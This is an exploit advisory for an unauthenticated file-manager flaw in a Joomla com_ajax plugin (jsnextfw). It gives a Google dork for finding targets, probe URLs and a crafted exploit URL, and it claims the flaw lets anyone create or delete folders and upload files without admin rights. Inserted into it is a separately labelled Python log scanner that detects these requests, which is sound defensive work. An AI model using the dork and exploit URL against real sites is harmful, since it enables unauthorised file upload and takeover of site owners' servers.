# Exploit Title : Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/10/2018
# Vendor Homepage : joomla.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:/index.php?option=com_ajax
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-287 - [ Improper Authentication ] - CWE-399 - [ Resource Management Errors ]
+ CWE-20 - [ Improper Input Validation ] - CWE-284 - [ Improper Access Control ]
+ CWE-306 - [ Missing Authentication for Critical Function ]
#################################################################################################
# Admin Panel Login Path =>
/administrator
# Check for Error Message and Vulnerability on the websites =>
/index.php?option=com_ajax&format=json
/PATH/index.php?option=com_ajax&format=json
/index.php/component/ajax/
{"success":true,"message":null,"messages":null,"data":null}
# Exploit =>
/index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder=images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component
# Directory Path => /images/...
Note =>
# We can create a folder.
# We can delete folder[s].
# We can upload a file without administration permissions.
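Added example (not part of the original advisory): a log scan a site owner can run to find requests matching the two URL shapes listed above, the com_ajax check without a plugin and the jsnextfw media-selector call. The combined log format, the constructed sample lines, and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Oct/2018:10:01:02 +0000] "GET /index.php?option=com_ajax&format=json HTTP/1.1" 200 61 "-" "curl/7.61"
198.51.100.7 - - [24/Oct/2018:10:01:09 +0000] "GET /index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder=images&editor=jform_articletext&tmpl=component HTTP/1.1" 200 8412 "-" "Mozilla/5.0"
203.0.113.20 - - [24/Oct/2018:10:05:40 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 15230 "-" "Mozilla/5.0"
203.0.113.20 - - [24/Oct/2018:10:06:11 +0000] "POST /sub/index.php?option=com_ajax&plugin=jsnextfw&context=media-selector&folder=images%2Fnew HTTP/1.1" 403 120 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Return 'media-selector', 'probe' or None for a request target."""
    parts = urlsplit(target)
    # Values are lower-cased: a deliberately loose match for detection purposes.
    q = {k: v[-1].lower()
         for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    is_ajax = q.get("option") == "com_ajax" or "/component/ajax" in parts.path.lower()
    if not is_ajax:
        return None
    if q.get("plugin") == "jsnextfw" and q.get("context") == "media-selector":
        return "media-selector"   # the file-manager call from the advisory
    if "plugin" not in q:
        return "probe"            # bare com_ajax check, as in the advisory
    return None

def scan(log_text):
    """Return (ip, method, status, kind) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # line is not in the assumed format
        ip, method, target, status = m.groups()
        kind = classify(target)
        if kind:
            hits.append((ip, method, int(status), kind))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on a media-selector hit from a client that holds no administrator session is the case to investigate; a 403 indicates the request was refused.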
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
# 0day.today [2018-10-28]